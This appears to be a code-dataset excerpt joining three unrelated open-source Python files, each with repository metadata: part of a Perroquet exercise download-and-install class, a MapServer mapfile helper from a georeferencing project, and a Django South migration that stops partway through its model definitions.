"""Define if the exo is a system exo or only a local one
A system exo store common data in a system directory and only the
progress in the local directory
"""
self.system = system
def is_installed(self):
return os.path.isfile(self.get_template_path())
def is_used(self):
return os.path.isfile(self.get_instance_path())
def is_done(self):
return os.path.isfile(self.get_done_path())
def start_install(self):
self.mutexInstalling.acquire()
self.canceled = False
self.downloadPercent = 0
self.play_thread_id = thread.start_new_thread(self.install_thread, ())
def cancel_install(self):
self.canceled = True
def wait_install_end(self):
self.mutexInstalling.acquire()
self.mutexInstalling.release()
def download(self):
f = urllib2.urlopen(self.get_file_path())
_, tempPath = tempfile.mkstemp("", "perroquet-");
wf = open(tempPath, 'w+b')
size = f.info().get('Content-Length')
if size is None:
size = 0
else:
size = int(size)
count = 0
sizeToRead = 50000
while not self.canceled:
data = f.read(sizeToRead)
wf.write(data)
if len(data) != sizeToRead:
break;
count += sizeToRead
self.downloadPercent = (round((float(count) / float(size)) * 100))
self.downloading = False
return tempPath
def get_download_percent(self):
return self.downloadPercent
def get_state(self):
#available
#downloading
#installing
#installed
#corrupted
#canceled
#removing
#used
#done
if self.state == "none":
if self.is_done():
self.state = "done"
elif self.is_used():
self.state = "used"
elif self.is_installed():
self.state = "installed"
else:
self.state = "available"
return self.state
def set_state(self, state):
oldState = self.state
self.state = state
self.notifyStateChange(oldState, self.callbackData)
def set_state_change_callback(self, callback, callbackData):
self.notifyStateChange = callback
self.callbackData = callbackData
def install_thread(self):
self.set_state("downloading")
tmpPath = self.download()
if self.canceled:
self.logger.info("remove temp file")
self.set_state("canceled")
os.remove(tmpPath)
else:
self.set_state("installing")
tar = tarfile.open(tmpPath)
outPath = self.get_local_path()
try:
os.makedirs(outPath)
except OSError, (ErrorNumber, ErrorMessage): # Python <=2.5
if ErrorNumber == errno.EEXIST:
pass
else: raise
tar.extractall(outPath)
tar.close()
os.remove(tmpPath)
if self.is_installed():
self.set_state("installed")
else:
self.set_state("corrupted")
self.mutexInstalling.release()
def get_template_path(self):
return os.path.join(self.get_local_path(), "template.perroquet")
def get_instance_path(self):
return os.path.join(self.get_personnal_local_path(), "instance.perroquet")
def get_done_path(self):
return os.path.join(self.get_personnal_local_path(), "done.perroquet")
def set_name(self, name):
self.name = name
def get_name(self):
return self.name
def set_id(self, id):
self.id = id
def get_id(self):
return self.id
def set_description(self, description):
self.description = description
def get_description(self):
return self.description
def set_licence(self, licence):
self.licence = licence
def get_licence(self):
return self.licence
def set_language(self, language):
self.language = language
def get_language(self):
return self.language
def set_media_type(self, mediaType):
self.mediaType = mediaType
def get_media_type(self):
return self.mediaType
def set_version(self, version):
self.version = version
def get_version(self):
return self.version
def set_author(self, author):
self.author = author
def get_author(self):
return self.author
def set_words_count(self, wordsCount):
self.wordsCount = wordsCount
def get_words_count(self):
return self.wordsCount
def set_author_website(self, authorWebsite):
self.authorWebsite = authorWebsite
def get_author_website(self):
return self.authorWebsite
def set_author_contact(self, authorContact):
self.authorContact = authorContact
def get_author_contact(self):
return self.authorContact
def set_packager(self, packager):
self.packager = packager
def get_packager(self):
return self.packager
def set_packager_website(self, packagerWebsite):
self.packagerWebsite = packagerWebsite
def get_packager_website(self):
return self.packagerWebsite
def set_packager_contact(self, packagerContact):
self.packagerContact = packagerContact
def get_packager_contact(self):
return self.packagerContact
def set_file_path(self, filePath):
self.filePath = filePath
def get_file_path(self):
return self.filePath
def set_translations_list(self, translationList):
self.translationList = translationList
def get_translations_list(self):
return self.translationList
def set_parent(self, parent):
self.parent = parent
def get_local_path(self):
versioned_id = None
if self.version is not None:
versioned_id = self.id + "_" + self.version
else:
versioned_id = self.id
return os.path.join(self.parent.get_local_path(), versioned_id)
def get_personnal_local_path(self):
versioned_id = None
if self.version is not None:
versioned_id = self.id + "_" + self.version
else:
versioned_id = self.id
return os.path.join(self.parent.get_personal_local_path(), versioned_id)
def parse_description(self, xml_exercise):
self.set_name(self._get_text(xml_exercise.getElementsByTagName("name")[0].childNodes))
self.set_id(self._get_text(xml_exercise.getElementsByTagName("id")[0].childNodes))
self.set_description(self._get_text(xml_exercise.getElementsByTagName("description")[0].childNodes))
self.set_licence(self._get_text(xml_exercise.getElementsByTagName("licence")[0].childNodes))
self.set_language(self._get_text(xml_exercise.getElementsByTagName("language")[0].childNodes))
self.set_media_type(self._get_text(xml_exercise.getElementsByTagName("media_type")[0].childNodes))
self.set_version(self._get_text(xml_exercise.getElementsByTagName("exercise_version")[0].childNodes))
self.set_author(self._get_text(xml_exercise.getElementsByTagName("author")[0].childNodes))
self.set_author_website(self._get_text(xml_exercise.getElementsByTagName("author_website")[0].childNodes))
self.set_author_contact(self._get_text(xml_exercise.getElementsByTagName("author_contact")[0].childNodes))
self.set_packager(self._get_text(xml_exercise.getElementsByTagName("packager")[0].childNodes))
self.set_packager_website(self._get_text(xml_exercise.getElementsByTagName("packager_website")[0].childNodes))
self.set_packager_contact(self._get_text(xml_exercise.getElementsByTagName("packager_contact")[0].childNodes))
if len(xml_exercise.getElementsByTagName("words_count")) > 0:
self.set_words_count(self._get_text(xml_exercise.getElementsByTagName("words_count")[0].childNodes))
if len(xml_exercise.getElementsByTagName("file")) > 0:
self.set_file_path(self._get_text(xml_exercise.getElementsByTagName("file")[0].childNodes))
if len(xml_exercise.getElementsByTagName("translations")) > 0:
xml_translations = xml_exercise.getElementsByTagName("translations")[0]
translationList = []
for xml_translation in xml_translations.getElementsByTagName("translation"):
translationList.append(self._get_text(xml_translation.childNodes))
self.set_translations_list(translationList)
def generate_description(self):
self._generate_description()
def _generate_description(self):
if not os.path.isdir(self.get_local_path()):
try:
os.makedirs(self.get_local_path())
except OSError, (ErrorNumber, ErrorMessage): # Python <=2.5
if ErrorNumber == 666: #EEXIST ???
pass
else: raise
impl = getDOMImplementation()
newdoc = impl.createDocument(None, "perroquet_exercise", None)
root_element = newdoc.documentElement
# Name
xml_name = newdoc.createElement("name")
xml_name.appendChild(newdoc.createTextNode(self.get_name()))
root_element.appendChild(xml_name)
# Id
xml_id = newdoc.createElement("id")
xml_id.appendChild(newdoc.createTextNode(self.get_id()))
root_element.appendChild(xml_id)
# Description
xml_description = newdoc.createElement("description")
xml_description.appendChild(newdoc.createTextNode(self.get_description()))
root_element.appendChild(xml_description)
# Words count
xml_version = newdoc.createElement("words_count")
xml_version.appendChild(newdoc.createTextNode(str(self.get_words_count())))
root_element.appendChild(xml_version)
# Version
xml_version = newdoc.createElement("exercise_version")
xml_version.appendChild(newdoc.createTextNode(self.get_version()))
root_element.appendChild(xml_version)
# Licence
xml_node = newdoc.createElement("licence")
xml_node.appendChild(newdoc.createTextNode(self.get_licence()))
root_element.appendChild(xml_node)
# Language
xml_node = newdoc.createElement("language")
xml_node.appendChild(newdoc.createTextNode(self.get_language()))
root_element.appendChild(xml_node)
# Media type
xml_node = newdoc.createElement("media_type")
xml_node.appendChild(newdoc.createTextNode(self.get_media_type()))
root_element.appendChild(xml_node)
# author
xml_node = newdoc.createElement("author")
xml_node.appendChild(newdoc.createTextNode(self.get_author()))
root_element.appendChild(xml_node)
# author website
xml_node = newdoc.createElement("author_website")
xml_node.appendChild(newdoc.createTextNode(self.get_author_website()))
root_element.appendChild(xml_node)
# author contact
xml_node = newdoc.createElement("author_contact")
xml_node.appendChild(newdoc.createTextNode(self.get_author_contact()))
root_element.appendChild(xml_node)
# packager
xml_node = newdoc.createElement("packager")
xml_node.appendChild(newdoc.createTextNode(self.get_packager()))
root_element.appendChild(xml_node)
# packager website
xml_node = newdoc.createElement("packager_website")
xml_node.appendChild(newdoc.createTextNode(self.get_packager_website()))
root_element.appendChild(xml_node)
# packager contact
xml_node = newdoc.createElement("packager_contact")
xml_node.appendChild(newdoc.createTextNode(self.get_packager_contact()))
root_element.appendChild(xml_node)
# template path
xml_node = newdoc.createElement("template")
xml_node.appendChild(newdoc.createTextNode(self.get_template_path()))
root_element.appendChild(xml_node)
# translation
#TODO
xml_string = newdoc.toprettyxml()
xml_string = xml_string.encode('utf8')
repoDescriptionPath = os.path.join(self.get_local_path(), "exercise.xml")
f = open(repoDescriptionPath, 'w')
f.write(xml_string)
f.close()
def init_from_path(self, exercisePath):
exerciseDescriptionPath = os.path.join(exercisePath, "exercise.xml")
if os.path.isfile(exerciseDescriptionPath):
f = open(exerciseDescriptionPath, 'r')
dom = parse(f)
self.parse_description(dom)
else:
self.id = os.path.basename(exercisePath)
self.name = self.id
self.description = gettext.gettext("Imported exercise")
def _get_text(self, nodelist):
rc = ""
for node in nodelist:
if node.nodeType == node.TEXT_NODE:
rc = rc + node.data
rc = rc.strip()
return rc
| gpl-3.0 | 3,889,338,079,324,293,000 | 32.346405 | 118 | 0.633281 | false |
slub/vk2-georeference | georeference/utils/process/mapfile.py | 1 | 4870 | # -*- coding: utf-8 -*-
'''
Copyright (c) 2015 Jacob Mendt
Created on 04.08.15
@author: mendt
'''
import os
import uuid
from mapscript import MS_IMAGEMODE_RGB, MS_OFF, MS_PIXELS, MS_LAYER_RASTER, layerObj, mapObj, MS_ON, outputFormatObj
from georeference.utils.exceptions import MapfileBindingInitalizationException
OutputFormat_JPEG = {"NAME":"jpeg","MIMETYPE":"image/jpeg","DRIVER":"AGG/JPEG","EXTENSION":"jpg",
"IMAGEMODE":MS_IMAGEMODE_RGB,"TRANSPARENT":MS_OFF}
Metadata = {"wms_srs":"EPSG:4326","wms_onlineresource":"http://localhost/cgi-bin/mapserv?",
"wms_enable_request":"*","wms_titel":"Temporary Messtischblatt WMS"}
def createMapfile(layername, datapath, georefTargetSRS, mapfileTemplate, mapfileDir, mapfileParams):
""" Function creates a temporary mapfile
:type layername: str
:type datapath: str
:type georefTargetSRS: int
:type mapfileTemplate: str
:type mapfileDir: str
:type mapfileParams: str """
try:
mapfile = MapfileBinding(mapfileTemplate,mapfileDir, **mapfileParams)
mapfile.addLayerToMapfile(datapath, layername, georefTargetSRS)
wms = mapfile.saveMapfile()
return wms
except:
raise
class MapfileBinding:
def __init__(self, src_mapfilePath, dest_mapfileFolder, **kwargs):
# init wms service name
self.servicename= "wms_%s.map"%uuid.uuid4()
# init the mapfile based on a template file
self.mapfilepath = os.path.join(dest_mapfileFolder, self.servicename)
self.__initMapfile__(src_mapfilePath, self.mapfilepath)
if len(kwargs) > 0:
self.__initMapfileParameter__(kwargs)
else:
raise MapfileBindingInitalizationException("Missing mapfile information!")
def __initMapfile__(self, src_mapfilePath, dest_mapfilePath):
mapfile = mapObj(src_mapfilePath)
self.saveMapfile(mapfile)
self.mapfile = mapObj(self.mapfilepath)
def __initMapfileParameter__(self, kwargs):
"""
Set the option parameter for the map element
"""
#generic mapfile options
self.mapfile.units = MS_PIXELS
self.mapfile.status = MS_ON
#if "OUTPUTFORMAT" in kwargs:
# self.__addOutputFormat__(kwargs["OUTPUTFORMAT"])
if "METADATA" in kwargs:
self.__addMetadata__(kwargs["METADATA"])
def __addMetadata__(self, dictMD):
self.wms_url = dictMD["wms_onlineresource"]+"map=%s"%self.mapfilepath
for key in dictMD:
if key is "wms_onlineresource":
self.mapfile.web.metadata.set(key,self.wms_url)
else:
self.mapfile.web.metadata.set(key,dictMD[key])
def __addOutputFormat__(self, dictOutFormat):
"""
Function adds a outputformat object to the mapfile.
@param dictOutFormat: Represents a dictionary with the outputformat arguments. It should
contains the keys:
@param NAME:
@param MIMETYPE:
@param DRIVER:
@param EXTENSION:
@param IMAGEMODE:
@param TRANSPARENT:
"""
# creates a OutputFormatObject and adds the parameter to it
if "DRIVER" in dictOutFormat:
outFormatObj = outputFormatObj(dictOutFormat["DRIVER"])
else:
raise MapfileBindingInitalizationException("Missing Driver for OutputFormat Element")
if "NAME" in dictOutFormat:
outFormatObj.name = dictOutFormat["NAME"]
if "MIMETYPE" in dictOutFormat:
outFormatObj.mimetype = dictOutFormat["MIMETYPE"]
if "EXTENSION" in dictOutFormat:
outFormatObj.extension = dictOutFormat["EXTENSION"]
if "IMAGEMODE" in dictOutFormat:
outFormatObj.imagemode = dictOutFormat["IMAGEMODE"]
if "TRANSPARENT" in dictOutFormat:
outFormatObj.transparent = dictOutFormat["TRANSPARENT"]
# adds the OutputFormatObject to the mapfile
self.mapfile.appendOutputFormat(outFormatObj)
def saveMapfile(self, mapfile = None):
if mapfile != None and isinstance(mapfile,mapObj):
mapfile.save(self.mapfilepath)
return None
else:
self.mapfile.save(self.mapfilepath)
return self.mapfile.getMetaData("wms_onlineresource")
def addLayerToMapfile(self, dataPath, layerName,georefTargetSRS):
""" Function adds a layer to a mapfile
:type dataPath: str
:type layerName: str
:type georefTargetSRS: int """
layer = layerObj()
layer.data = dataPath
layer.type = MS_LAYER_RASTER
layer.name = layerName
layer.units = MS_PIXELS
layer.status = MS_OFF
layer.setProjection("init=epsg:%s"%georefTargetSRS)
self.mapfile.insertLayer(layer)
| gpl-3.0 | 5,549,427,881,581,592,000 | 35.074074 | 116 | 0.641684 | false |
holgerd77/django-public-project | public_project/south_migrations/0023_auto__del_field_siteconfig_navi_link_color.py | 1 | 21861 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'SiteConfig.navi_link_color'
db.delete_column(u'public_project_siteconfig', 'navi_link_color')
def backwards(self, orm):
# Adding field 'SiteConfig.navi_link_color'
db.add_column(u'public_project_siteconfig', 'navi_link_color',
self.gf('django.db.models.fields.CharField')(default='#FFFFFF', max_length=7),
keep_default=False)
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'public_project.activitylog': {
'Meta': {'ordering': "['-date']", 'object_name': 'ActivityLog'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '2'})
},
u'public_project.comment': {
'Meta': {'ordering': "['-date_added']", 'object_name': 'Comment'},
'activation_hash': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'comment': ('django.db.models.fields.TextField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '250'}),
'feedback_allowed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'published_by': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.commentrelation': {
'Meta': {'object_name': 'CommentRelation'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.Comment']"}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'page': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
u'public_project.document': {
'Meta': {'ordering': "['-date_added']", 'object_name': 'Document'},
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date': ('django.db.models.fields.DateField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'document': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}),
'events': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_documents'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Event']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'participants': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_documents'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Participant']"}),
'pdf_images_generated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'project_parts': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_documents'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.ProjectPart']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.event': {
'Meta': {'ordering': "['-date']", 'object_name': 'Event'},
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date': ('django.db.models.fields.DateField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'event_type': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'important': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'participants': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_events'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Participant']"}),
'project_parts': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_events'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.ProjectPart']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.image': {
'Meta': {'ordering': "['title']", 'object_name': 'Image'},
'attribution': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'attribution_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.membership': {
'Meta': {'object_name': 'Membership'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'from_participant': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'from_memberships'", 'to': u"orm['public_project.Participant']"}),
'function': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'to_participant': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'to_memberships'", 'to': u"orm['public_project.Participant']"})
},
u'public_project.page': {
'Meta': {'ordering': "['number']", 'object_name': 'Page'},
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'document': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.Document']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'number': ('django.db.models.fields.IntegerField', [], {})
},
u'public_project.participant': {
'Meta': {'ordering': "['order', 'name']", 'object_name': 'Participant'},
'belongs_to': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['public_project.Participant']", 'through': u"orm['public_project.Membership']", 'symmetrical': 'False'}),
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '250'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '500', 'null': 'True', 'blank': 'True'})
},
u'public_project.projectgoal': {
'Meta': {'ordering': "['order']", 'object_name': 'ProjectGoal'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '100', 'null': 'True', 'blank': 'True'}),
'performance_figure': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'project_goal_group': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.ProjectGoalGroup']"})
},
u'public_project.projectgoalgroup': {
'Meta': {'object_name': 'ProjectGoalGroup'},
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'event': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.Event']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_current': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'project_part': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.ProjectPart']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.projectpart': {
'Meta': {'ordering': "['order', 'name']", 'object_name': 'ProjectPart'},
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'main_project_parts': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['public_project.ProjectPart']", 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '500', 'null': 'True', 'blank': 'True'})
},
u'public_project.question': {
'Meta': {'ordering': "['title']", 'object_name': 'Question'},
'answer': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'answered': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'documents': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_documents'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Document']"}),
'events': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_questions'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Event']"}),
'explanations': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'participants': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_questions'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Participant']"}),
'project_parts': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_questions'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.ProjectPart']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.researchrequest': {
'Meta': {'ordering': "['-date_added']", 'object_name': 'ResearchRequest'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nr': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'open': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.researchrequestrelation': {
'Meta': {'object_name': 'ResearchRequestRelation'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'page': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'research_request': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.ResearchRequest']"})
},
u'public_project.searchtag': {
'Meta': {'ordering': "['order']", 'object_name': 'SearchTag'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '100', 'null': 'True', 'blank': 'True'})
},
u'public_project.searchtagcacheentry': {
'Meta': {'ordering': "['-num_results']", 'object_name': 'SearchTagCacheEntry'},
'document': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.Document']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'num_results': ('django.db.models.fields.IntegerField', [], {}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.SearchTag']"})
},
u'public_project.sitecategory': {
'Meta': {'object_name': 'SiteCategory'},
'category': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'documents': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_site_categories'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Document']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'intro_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
u'public_project.siteconfig': {
'Meta': {'object_name': 'SiteConfig'},
'about_text': ('django.db.models.fields.TextField', [], {'default': "u'About text'"}),
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'contact_text': ('django.db.models.fields.TextField', [], {'default': "u'This text will be shown on the contact page.'"}),
'footer': ('django.db.models.fields.TextField', [], {'default': "u'This text will be shown in the footer of the site.'"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'intro_text': ('django.db.models.fields.TextField', [], {'default': "u'This is a project watch website.'"}),
'short_title': ('django.db.models.fields.CharField', [], {'default': "u'ProjectWatch'", 'max_length': '250'}),
'title': ('django.db.models.fields.CharField', [], {'default': "u'ProjectWatch'", 'max_length': '250'}),
'title_color': ('django.db.models.fields.CharField', [], {'default': "'#990000'", 'max_length': '7'})
},
u'public_project.userprofile': {
'Meta': {'object_name': 'UserProfile'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'receive_new_comment_emails': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['auth.User']", 'unique': 'True'})
},
u'public_project.websource': {
'Meta': {'ordering': "['order']", 'object_name': 'WebSource'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
'date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '100', 'null': 'True', 'blank': 'True'}),
